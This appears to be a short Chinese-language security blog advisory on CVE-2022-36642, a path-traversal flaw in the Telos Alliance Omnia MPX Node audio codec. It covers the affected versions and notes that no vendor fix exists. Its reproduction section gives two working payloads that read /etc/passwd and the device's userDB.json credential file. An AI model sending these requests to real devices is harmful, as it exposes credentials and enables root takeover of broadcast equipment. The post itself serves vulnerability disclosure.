(CVE-2022-36642)Telos Alliance Omnia MPX Node 信息泄露漏洞 admin 102485文章 87评论 2022年10月8日12:29:10评论128 views字数 641阅读2分8秒阅读模式 01 漏洞简介 Telos Alliance Omnia MPX Node是美国Telos Alliance公司的一个专用硬件编解码器。能够利用 Omnia μMPXTM 算法以低至 320 kbps 的数据速率发送或接收完整的 FM 信号,非常适合容量有限的网络(包括 IP 无线电)。 该漏洞源于/appConfig/userDB.json 存在本地文件泄露漏洞。攻击者利用该漏洞提升权限到 root 并执行任意命令。 02 影响范围 Telos Alliance Omnia MPX Node 1.5.0+r1版本及之前版本 03 漏洞复现 payload:/logs/downloadMainLog?fname=../../../../../../../etc/passwdpayload:/logs/downloadMainLog?fname=../../../../../../../config/MPXnode/www/appConfig/userDB.json 04 修复建议 目前厂商暂未发布修复措施解决此安全问题,建议使用此软件的用户随时关注厂商主页或参考网址以获取解决办法: https://www.telosalliance.com/radio-processing/audio-interfaces/omnia-mpx-node 本文章仅用于学习交流,不得用于非法用途 原文始发于微信公众号(才疏学浅的H6):(CVE-2022-36642)Telos Alliance Omnia MPX Node 信息泄露漏洞 点赞 https://cn-sec.com/archives/1302471.html 复制链接 复制链接 左青龙 微信扫一扫 右白虎 微信扫一扫
评论